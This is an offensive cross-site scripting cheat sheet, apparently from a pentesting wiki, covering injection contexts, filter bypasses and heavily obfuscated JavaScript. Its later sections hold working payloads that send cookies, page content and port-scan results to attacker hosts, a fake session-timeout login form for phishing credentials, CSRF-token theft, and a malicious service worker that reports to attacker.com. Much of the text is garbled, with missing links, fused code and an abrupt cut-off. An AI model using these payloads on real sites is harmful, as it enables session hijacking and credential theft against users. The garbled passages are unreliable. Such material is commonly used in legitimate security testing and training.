XSS (Cross Site Scripting)
Last updated
Was this helpful?
Last updated
Was this helpful?
Check if any value you control (parameters, path, headers?, cookies?) is being reflected in the HTML or used by JS code.
Find the context where it's reflected/used.
If reflected
Check which symbols can you use and depending on that, prepare the payload:
In raw HTML:
Can you create new HTML tags?
Can you use events or attributes supporting javascript:
protocol?
Can you bypass protections?
Is the HTML content being interpreted by any client side JS engine (AngularJS, VueJS, Mavo...), you could abuse a .
If you cannot create HTML tags that execute JS code, could you abuse a ?
Inside a HTML tag:
Can you exit to raw HTML context?
Can you create new events/attributes to execute JS code?
Does the attribute where you are trapped support JS execution?
Can you bypass protections?
Inside JavaScript code:
Can you escape the <script>
tag?
Can you escape the string and execute different JS code?
Are your input in template literals ``?
Can you bypass protections?
If used:
You could exploit a DOM XSS, pay attention how your input is controlled and if your controlled input is used by any sink.
In order to successfully exploit a XSS the first thing you need to find is a value controlled by you that is being reflected in the web page.
Intermediately reflected: If you find that the value of a parameter or even the path is being reflected in the web page you could exploit a Reflected XSS.
Stored and reflected: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a Stored XSS.
Accessed via JS: If you find that a value controlled by you is being access using JS you could exploit a DOM XSS.
When trying to exploit a XSS the first thing you need to know if where is your input being reflected. Depending on the context, you will be able to execute arbitrary JS code on different ways.
If your input is reflected inside the value of the attribute of a tag you could try:
To escape from the attribute and from the tag (then you will be in the raw HTML) and create new HTML tag to abuse: "><img [...]
If you can escape from the attribute but not from the tag (>
is encoded or deleted), depending on the tag you could create an event that executes JS code: " autofocus onfocus=alert(1) x="
If you cannot escape from the attribute ("
is being encoded or deleted), then depending on which attribute your value is being reflected in if you control all the value or just a part you will be able to abuse it. For example, if you control an event like onclick=
you will be able to make it execute arbitrary code when it's clicked. Another interesting example is the attribute href
, where you can use the javascript:
protocol to execute arbitrary code: href="javascript:alert(1)"
If your input is reflected inside "unexpoitable tags" you could try the accesskey
trick to abuse the vuln (you will need some kind of social engineer to exploit this): " accesskey="x" onclick="alert(1)" x="
In this case your input is reflected between <script> [...] </script>
tags of a HTML page, inside a .js
file or inside an attribute using javascript:
protocol:
If reflected between <script> [...] </script>
tags, even if your input if inside any kind of quotes, you can try to inject </script>
and escape from this context. This works because the browser will first parse the HTML tags and then the content, therefore, it won't notice that your injected </script>
tag is inside the HTML code.
If reflected inside a JS string and the last trick isn't working you would need to exit the string, execute your code and reconstruct the JS code (if there is any error, it won't be executed:
'-alert(1)-'
';-alert(1)//
\';alert(1)//
If reflected inside template literals `` you can embed JS expressions using ${ ... }
syntax: `var greetings =
Hello, ${alert(1)}```
There is JS code that is using unsafely some data controlled by an attacker like location.href
. An attacker, could abuse this to execute arbitrary JS code.
These kind of XSS can be found anywhere. They not depend just on the client exploitation of a web application but on any context. These kind of arbitrary JavaScript execution can even be abuse to obtain RCE, read arbitrary files in clients and servers, and more. Some examples:
In this case and if no black/whitelisting is used, you could use payloads like:
But, if tags/attributes black/whitelisting is being used, you will need to brute-force which tags you can create. Once you have located which tags are allowed, you would need to brute-force attributes/events inside the found valid tags to see how you can attack the context.
If you didn't find any valid HTML tag, you could try to create a custom tag and and execute JS code with the onfocus
attribute. In the XSS request, you need to end the URL with #
to make the page focus on that object and execute the code:
If some kind of blacklist is being used you could try to bypass it with some silly tricks:
Even if you cannot escape from the attribute ("
is being encoded or deleted), depending on which attribute your value is being reflected in if you control all the value or just a part you will be able to abuse it. For example, if you control an event like onclick=
you will be able to make it execute arbitrary code when it's clicked.
Another interesting example is the attribute href
, where you can use the javascript:
protocol to execute arbitrary code: href="javascript:alert(1)"
The HTML encoded characters inside the value of HTML tags attributes are decoded on runtime. Therefore something like the following will be valid (the payload is in bold): <a id="author" href="http://none" onclick="var tracker='http://foo?
'-alert(1)-'
';">Go Back </a>
Note that any kind of HTML encode is valid:
Note that URL encode will also work:
There you can use the protocols javascript:
or data:
in some places to execute arbitrary JS code. Some will require user interaction on some won't.
In general the javascript:
protocol can be used in any tag that accepts the attribute href
and in most of the tags that accepts the attribute src
(but not <img
)
In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.
Moreover, there is another nice trick for these cases: Even if your input inside javascript:...
is being URL encoded, it will be URL decoded before it's executed. So, if you need to escape from the string using a single quote and you see that it's being URL encoded, remember that it doesn't matter, it will be interpreted as a single quote during the execution time.
Note that if you try to use both URLencode + HTMLencode
in any order to encode the payload it won't work, but you can mix them inside the payload.
javascript:
You can use Hex and Octal encode inside the src
attribute of iframe
(at least) to declare HTML tags to execute JS:
If you can inject any URL in an arbitrary <a href=
tag that contains the target="_blank" and rel="opener"
attributes, check the following page to exploit this behavior:
The XSS payload will be something like this: " accesskey="x" onclick="alert(1)" x="
Several tricks with using different encoding were exposed already inside this section. Go back to learn where can you use HTML encoding, Unicode encoding, URL encoding, Hex and Octal encoding and even data encoding.
In these case you input is going to be reflected inside the JS code of a .js
file or between <script>...</script>
tags or between HTML events that can execute JS code or between attributes that accepts the javascript:
protocol.
If your code is inserted within <script> [...] var input = 'reflected data' [...] </script>
you could easily escape closing the <script>
tag:
Note that in this example we haven't even closed the single quote, but that's not necessary as the browser first performs HTML parsing to identify the page elements including blocks of script, and only later performs JavaScript parsing to understand and execute the embedded scripts.
If <>
are being sanitised you can still escape the string where your input is being located and execute arbitrary JS. It's important to fix JS syntax, because if there are any errors, the JS code won't be executed:
In order to construct strings apart from single and double quotes JS also accepts backticks ```````` . This is known as template literals as they allow to embedded JS expressions using ${ ... }
syntax.
Therefore, if you find that your input is being reflected inside a JS string that is using backticks, you can abuse the syntax ${ ... }
to execute arbitrary JS code:
This can be abused using: ${alert(1)}
">
">
$.getScript("//domain")
">
">
If a web page is creating a PDF using user controlled input, you can try to trick the bot that is creating the PDF into executing arbitrary JS code. So, if the PDF creator bot finds some kind of HTML tags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS.
If you cannot inject HTML tags it could be worth it to try to inject PDF data:
This technique won't be very useful for XSS but it could be useful to bypass WAF protections. This python code receive as input 2bytes and it search a surrogate pairs that have the first byte as the the last bytes of the High surrogate pair and the the last byte as the last byte of the low surrogate pair.
More info:
The decrement operator --
is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to NaN
. This can be used to remove the content of variables from the environment.
Arrow functions allow you to generate functions in a sigle line more easily (if you understand them)
So, most of the previous functions are actually useless because we aren't saving them anywhere to save and call them. Example creating the plusone
function:
The bind function allow to create a copy of a function modifying the this
object and the parameters given.
If you can access the object of a function you can get the code of that function
In cases where the function doesn't have any name, you can still print the function code from within:
Some random ways to extract the code of a function (even comments) from another function:
If your input is reflected on the raw HTML page you will need to abuse some HTML tag in order to execute JS code: <img , <iframe , <svg , <script
... these are just some of the many possible HTML tags you could use.
Also, keep in mind .
When your input is reflected inside the HTML page or you can escape and inject HTML code in this context the first thing you need to do if check if you can abuse <
to create new tags: Just try to reflect that char and check if it's being HTML encoded or deleted of if it is reflected without changes. Only in the last case you will be able to exploit this case.
For this cases also keep in mind .
Note: A HTML comment can be closed using -->
or --!>
Go to and click on Copy tags to clipboard. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can brute force all the events using the valid tags (in the same web page click on Copy events to clipboard and follow the same procedure as before).
Taken from the blog of .
The last one is using 2 unicode characters which expands to 5: telsr More of these characters can be found . To check in which characters are decomposed check . More tiny XSS for different environments payload **and [here**]().
If in order to exploit the vulnerability you need the user to click a link or a form with prepopulated data you could try to (if the page is vulnerable).
If you just think that it's impossible to create an HTML tag with an attribute to execute JS code, you should check because you could exploit the vulnerability without executing JS code.
If you are in inside a HTML tag, the first thing you could try is to escape from the tag and use some of the techniques mentioned in the to execute JS code. If you cannot escape from the tag, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag):
First of all check this page () for useful "on" event handlers. In case there is some blacklist preventing you from creating this even handlers you can try the following bypasses:
From : You can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
Read the.
Read the J.
//General function executions //Can be use as parenthesis alert`document.cookie` alert(document['cookie']) with(document)alert(cookie) (alert)(1) (alert(1))in"." a=alert,a(1) [1].find(alert) window['alert'](0) parent['alert'](1) self['alert'](2) top['alert'](3) this['alert'](4) frames['alert'](5) content['alert'](6) [7].map(alert) [8].find(alert) [9].every(alert) [10].filter(alert) [11].findIndex(alert) [12].forEach(alert); top[/al/.source+/ert/.source](1) top[8680439..toString(30)](1) Function("ale"+"rt(1)")(); new Function`al\ert\`6\
; Set.constructor('ale'+'rt(13)')(); Set.constructoral\x65rt\x2814\x29```; $='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y) x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y)) this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array) globalThis[
al+/ert/.source]
1this[
al+/ert/.source]
1[alert][0].call(this,1) window['a'+'l'+'e'+'r'+'t']() window['a'+'l'+'e'+'r'+'t'].call(this,1) top['a'+'l'+'e'+'r'+'t'].apply(this,[1]) (1,2,3,4,5,6,7,8,alert)(1) x=alert,x(1) [1].find(alert) top["al"+"ert"](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) al\u0065rt
1` top top top
``` ## **DOM vulnerabilities** There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code. **Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:** {% page-ref page="dom-xss.md" %} There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**. Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering). ## Other Bypasses ### Normalised Unicode You could check is the **reflected values** are being **unicode normalized** in the server \(or in the client side\) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-normalization-vulnerability.md#xss-cross-site-scripting). ### PHP FILTER\_VALIDATE\_EMAIL flag Bypass ```javascript ">"@x.y ``` ### Ruby-On-Rails bypass Due to **RoR mass assignment** quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields \(onfocus\) can be added inside the tag. Form example \([from this report](https://hackerone.com/reports/709336)\), if you send the payload: ```text contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa ``` The pair "Key","Value" will be echoed back like this: ```text {" onfocus=javascript:alert('xss') autofocus a"=>"a"} ``` Then, the onfocus attribute will be inserted:  A XSS occurs. ### Special combinations ```markup alert(1) alert('XSS') <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// <svg////////onload=alert(1)> <svg id=x;onload=alert(1)> <svg id=`x`onload=alert(1)> <img src=1 alt=al lang=ert onerror=top[alt+lang](0)> <script>$=1,alert($)confirm(1)$=1,\u0061lert($)<eval('\\u'+'0061'+'lert(1)')//<\u0061lert(1)alert(1) alert('1')</x> <iframe src=""/srcdoc='<svg onload=alert(1)>'> <svg><animate onbegin=alert() attributeName=x></svg> <img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)> <img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);" ``` ### XSS with header injection in a 302 response If you find that you can **inject headers in a 302 Redirect response** you could try to **make the browser execute arbitrary JavaScript**. This is **not trivial** as modern browsers do not interpret the HTTP response body if the HTTP response status code is a 302, so just a cross-site scripting payload is useless. In [**this report**](https://www.gremwell.com/firefox-xss-302) and [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) you can read how you can test several protocols inside the Location header and see if any of them allows the browser to inspect and execute the XSS payload inside the body. Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location header_, `resource://`. ### Obfuscation & Advanced Bypass * [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js) * [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs) * [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com/) * [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/) * [http://www.jsfuck.com/](http://www.jsfuck.com/) * More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce) * [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html) * [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html) ```javascript //Katana <script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() ``` ```javascript //JJencode$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())(); ``` ```javascript //JSFuck(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])() ``` ```javascript //aaencode ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_'); ``` ## XSS common payloads ### Retrieve Cookies ```javascript /?c="+document.cookie> new Image().src="http://<IP>/?c="+encodeURI(document.cookie);new Audio().src="http://<IP>/?c="+escape(document.cookie);location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookielocation = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookiedocument.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookiedocument.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookiedocument.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookiewindow.location="https://<SERVER_IP>/?c=".concat(document.cookie)var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie) ``` {% hint style="info" %} You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies.md#httponly) if you are lucky enough. {% endhint %} ### Steal Page Content ```javascript var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"; var attacker = "http://10.10.14.8/exfil"; var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { fetch(attacker + "?" + encodeURI(btoa(xhr.responseText))) } } xhr.open('GET', url, true); xhr.send(null); ``` ### Port Scanner \(fetch\) ```javascript const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i::placeholder { color:white; }document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>") ``` ### Auto-fill passwords capture ```javascript Username:</> Password:</> ``` When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated. ### Keylogger Just searching in github I found a few different ones: * [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger) * [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger) * [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger) * You can also use metasploit `http_javascript_keylogger` ### XSS - Stealing CSRF tokens ```javascript var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/email',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/email/change-email', true); changeReq.send('csrf='+token+'&email=test@test.com') }; ``` ### XSS - Stealing PostMessage messages ```markup window.onmessage = function(e){ document.getElementById("message").src += "&"+e.data; ``` ### XSS - Abusing Service Workers A service worker is a **script** that your browser **runs** in the **background**, separate from a web page, opening the door to features that don't need a web page or user interaction. \([More info about what is a service worker here](https://developers.google.com/web/fundamentals/primers/service-workers)\). The goal of this attack is to **create service workers** on the **victim session** inside the **vulnerable** web **domain** that grant the **attacker control** over **all the pages** the **victim** will load in **that domain**. In order to exploit this vulnerability you need to find: * A way to **upload arbitrary JS** files to the server and a **XSS to load the service worker** of the uploaded JS file * A **vulnerable JSONP request** where you can **manipulate the output \(with arbitrary JS code\)** and a **XSS** to **load the JSONP with a payload** that will **load a malicious service worker**. In the following example I'm going to present a code to **register a new service worke**r that will listen to the `fetch` event and will **send to the attackers server each fetched URL** \(this is the code you would need to **upload** to the **server** or load via a **vulnerable JSONP** response\): ```javascript self.addEventListener('fetch', function(e) { e.respondWith(caches.match(e.request).then(function(response) { fetch('https://attacker.com/fetch_url/' + e.request.url) }); ``` And this is the code that will **register the worker** \(the code you should be able to execute abusing a **XSS**\). In this case a **GET** request will be sent to the **attackers** server **notifying** if the **registration** of the service worker was successful or not: ```javascript window.addEventListener('load', function() { var sw = "/uploaded/ws_js.js"; navigator.serviceWorker.register(sw, {scope: '/'}) .then(function(registration) { var xhttp2 = new XMLHttpRequest(); xhttp2.open("GET", "https://attacker.com/SW/success", true); xhttp2.send(); }, function (err) { var xhttp2 = new XMLHttpRequest(); xhttp2.open("GET", "https://attacker.com/SW/error", true); xhttp2.send(); }); }); ``` In case of abusing a vulnerable JSONP endpoint you should put the value inside `var sw`. For example: ```javascript var sw = "/jsonp?callback=onfetch=function(e){ 